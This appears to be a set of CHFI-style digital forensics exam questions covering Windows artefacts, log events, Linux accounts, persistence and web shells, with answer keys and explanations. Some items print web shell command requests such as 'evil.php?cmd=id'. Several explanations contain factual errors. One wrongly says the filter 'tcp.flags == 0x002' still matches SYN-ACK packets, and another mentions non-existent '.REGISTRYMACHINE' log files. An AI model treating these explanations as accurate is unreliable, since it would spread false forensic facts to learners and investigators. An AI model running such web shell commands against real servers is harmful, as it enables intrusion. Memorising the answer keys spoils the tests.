In Linux, the /etc/shadow file stores user account passwords in hashed form, along with password aging information. This file is readable only by root (or privileged processes) to prevent unauthorized access to password hashes, unlike /etc/passwd which is world-readable and historically stored hashes but now typically shows an 'x' placeholder. The hashes are generated using algorithms like SHA-512 (crypt $6$) or yescrypt, as specified in the shadow file format.

Exam trap

Candidates often mistakenly think that /etc/passwd still contains password hashes, as it did in older Unix systems, but modern Linux distributions separate hashes into /etc/shadow for security.

How to eliminate wrong answers

Option A is wrong because /etc/passwd stores user account information (username, UID, GID, home directory, shell) but not password hashes; modern systems place an 'x' in the password field to indicate the hash is in /etc/shadow. Option C is wrong because /etc/group stores group membership information and group passwords (if any), not individual user password hashes. Option D is wrong because /var/log/auth.log is a log file for authentication events (e.g., login attempts, sudo usage), not a file containing stored password hashes.

121
MCQmedium

During a Windows forensic analysis, you find a suspicious LNK file in a user's Recent folder. Which of the following is NOT typically retrievable from an LNK file?

A.Username of the user who created the LNK file
B.Target file creation timestamp
C.Volume serial number of the target drive
D.Target file path
AnswerA

The Shell Link binary format has no dedicated field for the creating user's username or SID. LNK files identify the machine via the MachineID string and the target volume via a serial number, but attribution to a specific account must be reconstructed through indirect evidence like the NTFS USN journal, Prefetch, or shellbags, not read directly from the .lnk file.

Why this answer

LNK files store metadata about the target file and the system environment, but they do not record the username of the user who created the LNK file. The creation timestamp of the LNK file itself is stored, but the username is not part of the LNK file structure. Instead, the username context is inferred from the user's profile folder path where the LNK resides, not from the file's internal data.

Exam trap

EC-Council CHFI often tests the misconception that LNK files store the creator's username because they associate the file with a user's Recent folder, but the username is derived from the folder path, not the file's internal data.

How to eliminate wrong answers

Option B is wrong because LNK files do store the target file's creation timestamp in the shell link header (as a FILETIME structure). Option C is wrong because the volume serial number of the target drive is stored in the volume ID structure within the LNK file. Option D is wrong because the target file path is stored in the link target identifier (ITPIDLIST) and the link info structure, making it fully retrievable.

122
Multi-Selecteasy

A forensic analyst reviews a Windows system for signs of malware persistence. Which TWO registry locations are commonly used to achieve persistence via auto-start programs?

Select 2 answers
A.HKLM\SAM\SAM\Domains\Account\Users
B.HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist
C.HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
D.HKLM\SYSTEM\CurrentControlSet\Services
E.HKCU\Software\Microsoft\Windows\CurrentVersion\Run
AnswersC, E

This HKLM Run key is a critical persistence location: at every user logon, the Winlogon process reads it and launches each listed executable for all accounts, requiring administrative privileges to modify. Values are command lines (e.g., 'C:\malware.exe') that run early in the logon sequence, before the desktop is fully interactive. Because it has system-wide scope, it is a top target for malware persistence and a primary check during a forensic investigation for auto-start mechanisms.

Why this answer

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and HKCU\Software\Microsoft\Windows\CurrentVersion\Run are standard auto-start locations for all users and current user respectively. RunOnce keys execute once and are also used. But the most common are Run keys.

123
MCQmedium

A security analyst observes multiple Event ID 4625 logon failures for a single user account within a short time frame, followed by Event ID 4624 logon success. Which attack technique is MOST likely indicated?

A.Kerberos golden ticket attack
B.SQL injection attack on the authentication database
C.Brute-force or password spraying attack
D.Pass-the-hash attack
AnswerC

The correct finding: a burst of 4625 events followed by a 4624 event is the canonical signature of brute-force or password-spraying. Brute-force creates many failed attempts per target account with different passwords, while spraying uses one password across many accounts; both generate numerous 4625 audit records. When one guess finally matches, a 4624 success appears, confirming the attack succeeded.

Why this answer

Event ID 4625 indicates failed logon attempts, and Event ID 4624 indicates a successful logon. A rapid sequence of failures followed by a success for the same user account is the classic signature of a brute-force or password spraying attack, where an attacker tries multiple passwords until one works. This pattern is specific to authentication attempts against the local SAM or domain controller via NTLM or Kerberos, not to post-authentication attacks.

Exam trap

EC-CHFI often tests the distinction between pre-authentication attacks (brute-force, password spraying) and post-authentication attacks (pass-the-hash, golden ticket), where candidates mistakenly associate any successful logon after failures with a hash-based attack instead of recognizing the sequential failure-success pattern as brute-force.

How to eliminate wrong answers

Option A is wrong because a Kerberos golden ticket attack forges a Ticket Granting Ticket (TGT) using the KRBTGT hash, which does not generate multiple Event ID 4625 failures; instead, it produces a single successful logon (4624) with unusual attributes like a non-existent user or anomalous ticket options. Option B is wrong because SQL injection targets the database query layer, not Windows Security Log events 4625/4624; it would generate SQL server errors or application-level logs, not sequential logon failures. Option D is wrong because a pass-the-hash attack uses stolen NTLM hashes to authenticate without knowing the plaintext password, typically resulting in a single successful logon (4624) without preceding 4625 failures, as the hash is valid.

124
MCQeasy

In Linux forensics, an investigator examines /var/log/auth.log and finds repeated entries of "Failed password for root from 10.0.0.5 port 22 ssh2". Which type of attack is most likely indicated?

A.DNS cache poisoning attack
B.SQL injection attack
C.ARP spoofing attack
D.Brute force attack on SSH
AnswerD

A brute-force attack against SSH is the classic finding in auth.log, where sshd writes every authentication attempt via messages like 'Failed password for <user> from <IP> port <port> ssh2'. A sustained pattern of many such failures in a short window—especially with changing usernames or source IPs—indicates automated password guessing. This aligns with the observed log entries, and PAM may also log 'authentication failure' before sshd closes the connection. Because auth.log directly records this sequence, the investigator can correlate failed attempts and possibly successful follow-up logins to assess compromise.

Why this answer

Repeated 'Failed password for root' entries in /var/log/auth.log indicate multiple authentication attempts against the SSH service. This pattern is characteristic of a brute force attack, where an attacker systematically tries many passwords to gain unauthorized access to the root account via SSH.

Exam trap

This exam often tests the distinction between network-layer attacks (ARP spoofing, DNS poisoning) and application-layer attacks (SSH brute force), and the trap here is confusing repeated failed login attempts with a network-level attack like ARP spoofing.

How to eliminate wrong answers

Option A is wrong because DNS cache poisoning attacks target DNS resolver caches with forged DNS responses, not SSH authentication logs. Option B is wrong because SQL injection attacks exploit web application input fields to manipulate database queries, not SSH login attempts. Option C is wrong because ARP spoofing attacks manipulate ARP tables on a local network to intercept traffic, not SSH authentication logs.

125
MCQeasy

A security analyst is reviewing Windows Event Logs and notices multiple Event ID 4625 entries for a single user account within a short time frame. What does this most likely indicate?

A.Successful user logins
B.Account creation events
C.A brute-force password guessing attack
D.Service installation
AnswerC

A brute-force password guessing attack is characterized by a high volume of Event ID 4625 (failed logon) records in a short window, often for the same target user account, and frequently originating from multiple source IP addresses or repeated attempts with varying passwords. The Failure Reason on these events typically shows 'Unknown user name or bad password' (status code 0xC000006D) or 'the specified account's password has expired' when lockout policies exist. This pattern is the classic signature of an automated tool cycling through passwords, making it the correct interpretation of a surge in 4625 events.

Why this answer

Event ID 4625 is the Windows security log event for a failed logon attempt. A high frequency of these events for the same user account within a short time frame is a classic indicator of an automated brute-force password guessing attack, where an attacker tries multiple passwords against a single account.

Exam trap

The trap here is that candidates confuse Event ID 4625 (failed logon) with Event ID 4624 (successful logon) or assume any repeated event indicates a system error rather than an active attack.

How to eliminate wrong answers

Option A is wrong because Event ID 4625 specifically records failed logon attempts, not successful ones (successful logins generate Event ID 4624). Option B is wrong because account creation events are logged under Event ID 4720, not 4625. Option D is wrong because service installation events are recorded under Event ID 4697 (or 7045 in the System log), not 4625.

126
MCQmedium

During a forensic investigation, you find a file named ntuser.dat.LOG1 in a user's profile directory. What is the primary purpose of this file?

A.It contains the user's Internet browsing history
B.It logs changes to the user's registry hive for recovery purposes
C.It is a backup copy of the user's registry hive
D.It stores the user's recently accessed files
AnswerB

NTUSER.DAT.LOG1 is a transactional log file that records pending modifications to the NTUSER.DAT registry hive before they are committed to the main hive file. Windows uses these logs, along with .LOG2 and .REGISTRYMACHINE files, to replay incomplete writes and recover registry integrity after a crash or power failure. Forensically, the .LOG1 file can contain data that was never fully written to NTUSER.DAT, capturing recent changes that might not be present in the main hive. This is why the correct interpretation is that it logs changes for recovery, not a simple backup.

Why this answer

The ntuser.dat.LOG1 file is a transactional log file used by the Windows registry to record changes made to the corresponding user's registry hive (ntuser.dat). Its primary purpose is to ensure data integrity and enable recovery of the hive in case of a system crash or power failure during a write operation, by allowing the registry to replay or roll back incomplete transactions.

Exam trap

The trap here is that candidates often confuse the LOG1 file with a simple backup or a log of user activity like browsing history, when in fact it is a low-level transactional log for registry integrity, not a user-visible log file.

How to eliminate wrong answers

Option A is wrong because Internet browsing history is stored in separate files such as the WebCacheV01.dat or history files within the user's AppData folder, not in registry log files. Option C is wrong because ntuser.dat.LOG1 is not a backup copy; it is a transactional log that records changes, whereas a backup copy would be a separate file like ntuser.dat.regback or a System Restore point. Option D is wrong because recently accessed files are tracked in the user's Jump Lists, the Recent folder, or the MRU (Most Recently Used) lists within the registry itself, not specifically in the LOG1 file.

127
Multi-Selecthard

Which THREE of the following are indicators of a web shell on a web server? (Select three.)

Select 3 answers
A.Unexpected file modifications in web directories, especially .php, .asp, or .jsp files
B.Presence of processes like cmd.exe or /bin/bash running under the web server user
C.An increase in 404 errors due to directory traversal attempts
D.Regular successful logins from multiple IP addresses
E.Atypical HTTP requests containing system commands (e.g., ?cmd=whoami)
AnswersA, B, E

Web shells are typically script files placed in web-accessible directories, and their presence is often revealed by changes to file integrity—new files appearing or existing files altered with PHP/ASP/JSP content. A file integrity monitoring system would flag these modifications, and during forensic analysis, file hashes and timestamps can correlate with the attack timeline. This is a strong indicator because legitimate content management processes rarely modify executable scripts in web root directories without corresponding change-control records.

Why this answer

Option A is correct because web shells are typically dropped as script files in web-accessible directories, so unexpected creation or modification of .php, .asp, or .jsp files is a strong indicator of compromise. Option B is correct because a web shell often executes OS commands, causing processes such as cmd.exe on Windows or /bin/bash on Linux to run under the web server's service account (e.g., www-data, apache, or IIS APPPOOL), which is abnormal for normal web serving. Option E is correct because web shells commonly accept commands via HTTP parameters like ?cmd=whoami, so atypical requests embedding system commands in URLs or POST bodies are a direct sign of web shell activity.

Option C is not correct because a rise in 404 errors from directory traversal attempts indicates scanning or probing, not necessarily an installed web shell. Option D is not correct because regular successful logins from multiple IP addresses may indicate credential sharing or other account misuse, but it is not a specific indicator of a web shell on the server.

Exam trap

The trap here is that candidates confuse the symptoms of a web shell's activity (like directory traversal attempts or login anomalies) with the definitive artifacts of the web shell itself, leading them to select options that indicate attack vectors rather than the web shell's presence.

128
MCQmedium

A security analyst is investigating a potential intrusion and finds a webshell on a Linux web server. Which of the following logs would be MOST useful to determine how the webshell was uploaded?

A./var/log/syslog
B./var/log/apache2/access.log
C./var/log/auth.log
D./var/log/kern.log
AnswerB

/var/log/apache2/access.log is the canonical location for Apache web server request logging, typically using the combined log format to capture source IP, timestamp, HTTP method, URI, response status, user agent, and request bytes. A file upload manifests as a POST request to a specific endpoint, often with a large request size, and the access log provides the definitive timeline and source information needed for intrusion analysis. This log is the first stop for correlating suspicious upload activity with a specific client and session.

Why this answer

The Apache access log (/var/log/apache2/access.log) records every HTTP request made to the web server, including the method (e.g., POST), URI, source IP, and user-agent. A webshell is typically uploaded via a file upload vulnerability or a crafted HTTP request (e.g., PUT or POST with multipart/form-data), so the access log will show the exact request that transferred the malicious file to the server, making it the most useful for determining the upload vector.

Exam trap

EC-Council often tests the misconception that syslog or auth.log would capture web-based attacks, but the trap here is that candidates confuse system-level logs (auth, syslog, kern) with application-level logs (Apache access log), which are the only ones that record HTTP request details needed to trace a webshell upload.

How to eliminate wrong answers

Option A is wrong because /var/log/syslog is a general system log that records kernel messages, daemon events, and system services, but it does not log individual HTTP requests or file uploads to a web server. Option C is wrong because /var/log/auth.log records authentication attempts (e.g., SSH logins, sudo commands) and is irrelevant to webshell uploads that occur through the web application layer. Option D is wrong because /var/log/kern.log contains kernel-level messages (e.g., hardware drivers, system calls) and has no visibility into HTTP traffic or web application file operations.

129
Multi-Selectmedium

A forensic analyst is investigating a Windows system and wants to identify recently executed programs. Which TWO artifacts should the analyst examine?

Select 2 answers
A.MRU lists
B.Prefetch files
C.UserAssist
D.ShellBags
E.Jump lists
AnswersB, C

Prefetch files are created in C:\Windows\Prefetch when an application executes on Windows, serving as a performance optimization. Each .pf file contains the executable path, run count, last run timestamp, and a list of loaded modules (DLLs), making it a primary artifact for directly recording program execution. This is the strongest evidence for determining which applications were launched, including historically executed programs, though it may be disabled on SSDs or under certain configurations.

Why this answer

Prefetch files (B) are correct because Windows stores execution metadata in C:\Windows\Prefetch as .pf files, recording the executable name, run count, and last-run timestamps, making them a primary artifact for proving program execution. UserAssist (C) is correct because it tracks GUI-based program launches via ROT13-encoded entries under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist, including run counts and last-execution times for user-initiated applications. MRU lists (A) only show recently accessed files or commands, not necessarily executed programs, so they are weaker execution evidence.

ShellBags (D) record folder view settings and window positions, reflecting folder navigation rather than program execution. Jump lists (E) are tied to taskbar/application recent-item history and indicate files opened by an application, but they do not directly prove that a program itself was executed.

Exam trap

Candidates often confuse artifacts that track file access (MRU lists, Jump lists) with those that track program execution (Prefetch, UserAssist), leading to incorrect selection of MRU lists or Jump lists as evidence of program execution.

130
MCQeasy

Which Wireshark filter should an analyst use to display only TCP packets that have the SYN flag set and the ACK flag not set?

A.tcp.flags.syn == 1 or tcp.flags.ack == 0
B.tcp.flags.syn == 1 and tcp.flags.ack == 0
C.tcp.flags.syn == 1
D.tcp.flags == 0x002
AnswerB

This filter requires both conditions to be true: SYN=1 and ACK=0, which precisely identifies the initial SYN segment sent by the host initiating a TCP connection. During the three-way handshake, a SYN-ACK response has SYN=1 but also ACK=1, so it is excluded by the ACK=0 requirement. This is the standard, readable Wireshark filter for finding connection attempts, and it reliably distinguishes the connection initiator from the responder.

Why this answer

The filter `tcp.flags.syn == 1 and tcp.flags.ack == 0` uses the logical AND operator to require that the SYN flag is set (value 1) and the ACK flag is not set (value 0). This precisely matches the condition for a TCP SYN packet that is not part of a SYN-ACK handshake response, which is exactly what the analyst needs to isolate.

Exam trap

The trap here is that candidates often confuse the logical OR with AND, or assume that checking only the SYN flag is sufficient, forgetting that SYN-ACK packets also have SYN set and must be explicitly excluded.

How to eliminate wrong answers

Option A is wrong because using the OR operator (`tcp.flags.syn == 1 or tcp.flags.ack == 0`) will display packets where either the SYN flag is set OR the ACK flag is not set, which includes many packets that do not meet the requirement (e.g., packets with only ACK=0 but SYN=0, or packets with SYN=1 and ACK=1). Option C is wrong because `tcp.flags.syn == 1` alone will display all packets with the SYN flag set, including SYN-ACK packets (where both SYN and ACK are set), which fails to exclude those with ACK set. Option D is wrong because `tcp.flags == 0x002` matches only the SYN flag in the TCP flags byte (bit 1), but this filter does not check the ACK flag (bit 4, value 0x010); it will still capture SYN-ACK packets if the ACK flag is also set, since the filter only checks the SYN bit and ignores other flags.

131
MCQeasy

Which tool is commonly used for timeline analysis in digital forensics, combining multiple artifacts into a super timeline?

A.Plaso
B.Autopsy
C.Sleuth Kit
D.Wireshark
AnswerA

Plaso (formerly log2timeline) is the de facto standard for creating comprehensive 'super timelines' in digital forensics. It recursively parses file system metadata, system logs, browser history, registry hives, and numerous application artifacts, normalizing timestamps to UTC and exporting them into a unified SQLite or CSV timeline. This aggregated, holistic view of system activity is what makes Plaso the benchmark tool for timeline analysis.

Why this answer

Plaso (log2timeline) is the correct tool for timeline analysis because it ingests multiple forensic artifacts (e.g., registry hives, event logs, file system metadata, browser history) and correlates them into a single, unified super timeline. This allows investigators to reconstruct events across different data sources in chronological order, which is essential for timeline analysis in digital forensics.

Exam trap

EC-Council often tests the distinction between a tool that performs a specific function (Plaso for super timeline creation) versus a platform that integrates multiple tools (Autopsy), leading candidates to mistakenly choose Autopsy because it is a more familiar, all-in-one forensic suite.

How to eliminate wrong answers

Option B (Autopsy) is wrong because Autopsy is a GUI-based digital forensics platform that uses The Sleuth Kit and other modules for analysis, but it does not natively create a super timeline from multiple artifacts; it relies on Plaso or other tools for that specific function. Option C (Sleuth Kit) is wrong because Sleuth Kit is a collection of command-line tools for low-level file system analysis (e.g., extracting MFT entries, recovering deleted files) and does not combine artifacts from disparate sources into a unified timeline. Option D (Wireshark) is wrong because Wireshark is a network protocol analyzer used for capturing and inspecting live or recorded network traffic (e.g., TCP/IP packets), not for analyzing local forensic artifacts or building timelines.

132
MCQmedium

An investigator finds a suspicious LNK file on a Windows desktop pointing to an executable in the Temp folder. What is the significance of LNK files in forensic analysis?

A.They provide evidence of file access and execution
B.They store network share credentials in plaintext
C.They contain the full content of the target file
D.They are used exclusively for system files
AnswerA

LNK files are Windows shortcut binaries that persist in user profile directories such as Recent Items when a file is opened or a program is launched. They store the target's absolute path, working directory, and shell item ID list, which can include volume serial numbers and NTFS file reference numbers. A forensic examiner can correlate the link's LastWrite time and embedded timestamps to prove the specific user accessed the target on that system. Thus, LNK files serve as strong indicators of file access and program execution.

Why this answer

LNK files (Windows shortcuts) contain metadata about the target file, including its path, creation/modification timestamps, and volume information. When a user double-clicks an LNK file, Windows follows the link to execute the target, so the presence of an LNK file pointing to an executable in the Temp folder is strong evidence that the executable was accessed or executed from that location. This is critical in forensic analysis for reconstructing user activity and identifying potential malware execution.

Exam trap

EC-Council often tests the misconception that LNK files contain the actual file content or credentials, leading candidates to choose options B or C, but the key is that LNK files are metadata-only references to the target file's location and execution history.

How to eliminate wrong answers

Option B is wrong because LNK files do not store network share credentials in plaintext; they may contain a target path to a network share, but credentials are never embedded. Option C is wrong because LNK files are shortcuts that only store a reference (path and metadata) to the target file, not the full content of the target file. Option D is wrong because LNK files are used for any file or application, not exclusively for system files; they are commonly created by users and applications for all types of files.

133
MCQmedium

A network forensics analyst captures traffic from a suspected data exfiltration. In Wireshark, filtering for DNS queries containing a long subdomain with base64-encoded text suggests which technique?

A.DNS tunneling
B.DNS hijacking
C.DNS poisoning
D.DNS amplification
AnswerA

DNS tunneling is a covert channel in which an attacker embeds data payloads into DNS query labels and response records (commonly TXT) and exchanges that data with a domain the attacker controls. Unlike a simple resolution failure, these queries form a bidirectional communication stream that bypasses typical egress filters because UDP port 53 is almost always allowed to leave the network. In the captured traffic, this pattern appears as a high volume of unique subdomains or unusually large TXT responses, making it the correct diagnosis over the other choices.

Why this answer

DNS tunneling encodes data (often base64) into DNS query subdomains to bypass network controls and exfiltrate information. Wireshark filtering for unusually long DNS queries with encoded text directly reveals this technique, as legitimate DNS queries rarely contain such payloads.

Exam trap

EC-Council often tests the distinction between data exfiltration techniques (tunneling) and network abuse attacks (amplification, poisoning, hijacking), so candidates mistakenly pick DNS amplification because it also involves unusual DNS traffic patterns.

How to eliminate wrong answers

Option B is wrong because DNS hijacking redirects DNS resolution to malicious servers, not exfiltrate data via query content. Option C is wrong because DNS poisoning corrupts resolver caches with false records, not encode data in queries. Option D is wrong because DNS amplification is a DDoS attack that uses small queries to generate large responses, not a data exfiltration method.

134
MCQmedium

A network analyst captures traffic and sees an HTTP request containing: GET /wp-content/uploads/evil.php?cmd=id HTTP/1.1. Which of the following is MOST likely occurring?

A.Webshell access
B.SQL injection attack
C.Cross-site scripting (XSS) attack
D.Directory traversal attack
AnswerA

The request to a PHP file carrying a 'cmd' parameter is the hallmark of a webshell: the script accepts the parameter and passes it to a server-side command execution function such as system(), exec(), or passthru(). This gives the attacker a remote command prompt on the web server, so the observed traffic is direct evidence of webshell access rather than any of the other attack classes.

Why this answer

The HTTP request `GET /wp-content/uploads/evil.php?cmd=id HTTP/1.1` indicates that the attacker is accessing a PHP file (`evil.php`) in the WordPress uploads directory and passing a command (`cmd=id`) to it. This is a classic indicator of a webshell — a malicious script uploaded to the server that allows remote command execution. The `id` command is a common Unix command used to verify the current user context, confirming the attacker has achieved interactive shell-like access.

Exam trap

The CHFI exam often tests the distinction between webshell (command execution) and code injection (SQLi/XSS). The trap here is that candidates see a parameter (`cmd=id`) and mistakenly think it is SQL injection, but the absence of SQL syntax and the presence of a system command (`id`) clearly point to a webshell.

How to eliminate wrong answers

Option B (SQL injection attack) is wrong because the request does not include SQL syntax (e.g., `' OR 1=1--`) or target a database query parameter; it directly executes a system command via `cmd=id`. Option C (Cross-site scripting (XSS) attack) is wrong because XSS involves injecting client-side scripts (e.g., JavaScript) into web pages viewed by other users, not executing server-side commands. Option D (Directory traversal attack) is wrong because the path `/wp-content/uploads/evil.php` does not contain traversal sequences like `../` to escape the web root; instead, it accesses a file within the expected uploads directory.

135
MCQmedium

An investigator is analyzing a Windows 10 system suspected of malware persistence. Which registry key is commonly used by malware to achieve persistence by running a program at every user logon?

A.HKLM\SAM\SAM
B.HKLM\SYSTEM\CurrentControlSet\Services
C.HKCU\Software\Microsoft\Windows\CurrentVersion\Run
D.HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall
AnswerC

This is the canonical per-user Autorun key: when the user logs in, Winlogon/Explorer enumerates values under HKCU\Software\Microsoft\Windows\CurrentVersion\Run and launches each command line, making it the exact location an investigator should inspect for a user-specific startup program. The HKCU hive is loaded from the user's NTUSER.DAT, so findings here are tied to a single profile. Because the question asks about a Windows 10 user logon startup, this key is the correct answer.

Why this answer

The HKCU\Software\Microsoft\Windows\CurrentVersion\Run registry key is a standard autostart location that Windows checks at every user logon. Malware commonly writes a value here pointing to its executable path, ensuring it runs automatically each time the user logs into their account. This is a well-documented persistence mechanism in Windows forensics.

Exam trap

The trap here is that candidates confuse the Run key with the Services key (Option B), thinking that any service can achieve per-user logon persistence, but services run under the SYSTEM account and are not triggered by user logon unless specifically configured with a trigger-start service or by setting the service to 'Automatic' and relying on delayed start, which is not the standard per-user logon mechanism.

How to eliminate wrong answers

Option A is wrong because HKLM\SAM\SAM stores the Security Account Manager database containing user password hashes and local account information, not autostart locations; it is unrelated to program persistence at logon. Option B is wrong because HKLM\SYSTEM\CurrentControlSet\Services is used to register Windows services that start automatically with the system (e.g., at boot), not specifically at every user logon; while services can be configured for delayed start or automatic start, the Run key is the direct per-user logon mechanism. Option D is wrong because HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall stores uninstallation metadata for installed applications, not autostart entries; malware would not use this key to achieve persistence.

136
MCQmedium

An attacker has compromised a Linux server and edited the /etc/passwd file to change a user's UID to 0. What is the likely goal of this modification?

A.To lock the user account
B.To escalate privileges to root
C.To enable password-less login
D.To hide the user account from the system
AnswerB

The attacker changes the UID field to 0 because Linux kernels treat UID 0 as the root superuser and give it unrestricted access to all files, processes, and system calls. When the compromised user logs in, the session adopts that UID and inherits full root capabilities without needing su or sudo. This is a classic privilege‑escalation persistence: the account effectively becomes an alternate root entry.

Why this answer

In Linux, the UID 0 is reserved for the root user, who has unrestricted access to the system. By changing a user's UID to 0, the attacker grants that user the same privileges as root, effectively escalating their access to the highest level. This is a classic privilege escalation technique because the kernel identifies root by UID, not by the username.

Exam trap

A common misconception tested on the EC-CHFI exam is that changing the UID to 0 only affects the user's group or that it is equivalent to adding the user to the root group, when in fact UID 0 grants full root privileges regardless of group membership.

How to eliminate wrong answers

Option A is wrong because locking a user account is done by placing an exclamation mark or asterisk in the password hash field of /etc/shadow, not by changing the UID in /etc/passwd. Option C is wrong because password-less login is typically configured by setting an empty password hash in /etc/shadow or using SSH keys, not by modifying the UID. Option D is wrong because hiding a user account from the system is not achieved by changing the UID; accounts are hidden by using a UID below 1000 (or the defined system UID range) or by manipulating /etc/login.defs, but UID 0 is the most visible and privileged identifier.

137
MCQhard

A forensic examiner is analyzing a compromised Linux server and notices that /etc/cron.daily contains a script named 'sysupdate.sh' that runs a base64-encoded command. Which persistence mechanism is being used?

A.LD_PRELOAD library injection
B.Cron job for daily execution
C.Systemd service
D.SSH authorized_keys backdoor
AnswerB

A script located in /etc/cron.daily is a clear indicator of a cron-based persistence mechanism, since this directory is executed daily by cron (or anacron) on most Linux distributions. The contents of the script are run with the privileges of the user who owns it, often root, making it a powerful backdoor for maintaining access. Forensic examiners should inspect the script for malicious commands, check its permissions, and correlate the file creation timestamp with the initial compromise window.

Why this answer

The presence of a script named 'sysupdate.sh' inside /etc/cron.daily indicates that the system's cron daemon is configured to execute this script once per day. Cron jobs are a standard Linux persistence mechanism, and placing a script in /etc/cron.daily ensures it runs automatically on a daily schedule, making option B correct.

Exam trap

The trap here is that candidates may confuse cron directories with other persistence mechanisms like systemd timers or SSH backdoors, but the specific path /etc/cron.daily directly points to a cron-based daily job.

How to eliminate wrong answers

Option A is wrong because LD_PRELOAD library injection is a runtime technique that forces a process to load a shared library before others, not a scheduled execution mechanism like a cron job. Option C is wrong because a Systemd service requires a .service unit file in /etc/systemd/system or similar, not a script in /etc/cron.daily. Option D is wrong because an SSH authorized_keys backdoor involves adding an attacker's public key to ~/.ssh/authorized_keys for remote access, not a scheduled script execution.

138
MCQeasy

Which Windows Event ID is generated when a new service is installed on the system?

A.4648
B.4720
C.7045
D.4624
AnswerC

Event ID 7045 is the correct answer. It is a System log event emitted by the Service Control Manager whenever a new service is installed on the machine. The event details include the service name, executable path, service type (e.g., kernel driver or own process), start type, and the service account. This event is generated at the time of installation, making it the definitive indicator of a new service being added.

Why this answer

Windows Event ID 7045 is specifically logged in the System event log when a new service is installed on the system. This event records the service name, image path, service type, and start mode, making it a critical artifact for forensic investigators tracking unauthorized service installations or persistence mechanisms.

Exam trap

The trap here is that candidates often confuse Event ID 7045 with Security log events like 4720 (user creation) or 4624 (logon), because they assume service installation is logged in the Security log, but it is actually recorded in the System log under a different event source.

How to eliminate wrong answers

Option A is wrong because Event ID 4648 is used to log explicit credential usage (e.g., when a user runs a task with alternate credentials via RunAs), not service installation. Option B is wrong because Event ID 4720 is a Security event that logs the creation of a new user account in Active Directory, not a service installation. Option D is wrong because Event ID 4624 is a Security event that logs successful user logon events, not service installation.

139
Multi-Selecteasy

During a Windows forensic investigation, an analyst finds prefetch files with the .pf extension. Which TWO pieces of information can the analyst obtain from analyzing prefetch files?

Select 2 answers
A.The number of times the application has been executed
B.The exact date and time of each execution
C.The username that executed the application
D.The command-line arguments used to launch the program
E.The IP addresses the application connected to
AnswersA, B

Prefetch files record an execution count in their header, incremented each time the associated application runs. This directly satisfies the stem's requirement for execution frequency, letting the analyst establish how often a suspect binary or tool was launched on the Windows system under investigation.

Why this answer

Prefetch files (.pf) in Windows record execution metadata for applications, and option A is correct because each prefetch file stores an execution count showing how many times the application has been run. Option B is also correct because prefetch files contain timestamps, including the last execution time and, in many versions, up to eight previous execution times, allowing an analyst to determine when the application was executed. These timestamps are stored in the prefetch file's metadata and are a core reason prefetch analysis is valuable in forensics.

Option C is not correct because prefetch files do not record the username that executed the application; that information is typically found in other artifacts such as Security event logs or UserAssist. Option D is not correct because command-line arguments are not stored in prefetch files; they are more commonly recovered from process execution artifacts like ShimCache, AmCache, or event logs. Option E is not correct because prefetch files do not contain network connection data such as IP addresses; those would be found in network artifacts or logs.

Exam trap

A common misconception is that prefetch files contain user-specific data or command-line arguments, but they only store execution count and timestamps, not user identity or process invocation details.

140
MCQeasy

In Linux forensics, which file contains user account information including the user ID, group ID, home directory, and default shell?

A./etc/passwd
B./var/log/auth.log
C./etc/shadow
D./proc/cpuinfo
AnswerA

The /etc/passwd file is the traditional system account database in Linux, containing one colon-delimited entry per user account. Each line includes the username, a password placeholder (usually x), user ID, group ID, GECOS description, home directory, and default login shell. This file is the authoritative source for identifying which accounts exist on a system during forensic analysis. Password hashes themselves are stored separately in /etc/shadow, not here.

Why this answer

The /etc/passwd file is the standard Linux user database that stores essential account details, including the username, user ID (UID), group ID (GID), home directory path, and default shell. Each line in this file corresponds to a user account and uses a colon-delimited format (e.g., username:x:UID:GID:comment:home:shell). This file is world-readable because it does not contain passwords (which are stored in /etc/shadow), making it the correct source for the information listed in the question.

Exam trap

EC-CHFI often tests the distinction between /etc/passwd and /etc/shadow, trapping candidates who confuse the password storage location with the account information file, leading them to incorrectly select /etc/shadow because they associate it with user accounts.

How to eliminate wrong answers

Option B is wrong because /var/log/auth.log is a log file that records authentication-related events (e.g., login attempts, sudo usage) and does not contain static user account information like UID, GID, home directory, or default shell. Option C is wrong because /etc/shadow stores encrypted password hashes and password policy data (e.g., expiration dates), not the user ID, group ID, home directory, or shell; it is also readable only by root. Option D is wrong because /proc/cpuinfo is a virtual file that provides CPU hardware details (e.g., model, cores, flags) and has no relation to user account configuration.

141
MCQeasy

A forensic analyst is performing timeline analysis on a compromised system. Which tool is specifically designed to parse multiple log sources and create a super timeline?

A.Sleuth Kit
B.log2timeline
C.Volatility
D.Wireshark
AnswerB

log2timeline parses disparate artefacts — event logs, file system metadata, registry hives — into a single bodyfile, which Plaso then sorts into a super timeline. This satisfies the requirement to correlate multiple log sources chronologically.

Why this answer

log2timeline (now part of the plaso framework) is specifically designed to parse multiple log sources—such as Windows Event Logs, syslog, web server logs, and file system metadata—and aggregate them into a single super timeline. This enables forensic analysts to correlate events across disparate logs for timeline analysis, which is exactly the requirement in the question.

Exam trap

EC-Council often tests the distinction between disk forensics tools (Sleuth Kit), memory forensics tools (Volatility), network forensics tools (Wireshark), and timeline/log analysis tools (log2timeline), so candidates mistakenly choose a tool they recognize from other forensics domains without reading the specific requirement for parsing multiple log sources.

How to eliminate wrong answers

Option A is wrong because Sleuth Kit is a collection of command-line tools for analyzing disk images and file system structures (e.g., extracting deleted files, viewing MFT entries), not for parsing multiple log sources to create a super timeline. Option C is wrong because Volatility is a memory forensics framework used to analyze RAM dumps (e.g., processes, network connections, registry hives in memory), not for parsing log files from disk. Option D is wrong because Wireshark is a network protocol analyzer that captures and inspects live or recorded packet captures (pcap files), not for parsing system or application logs into a timeline.

142
Multi-Selecteasy

A network forensic investigator is analyzing traffic from a compromised web server. Which TWO artifacts are MOST likely to indicate the presence of a web shell? (Select TWO.)

Select 2 answers
A.Multiple DNS queries to external domains
B.Excessive SYN-ACK packets
C.Presence of a suspicious .aspx or .php file in web directories
D.Unusual HTTP POST requests to non-standard scripts
E.High volume of ICMP traffic
AnswersC, D

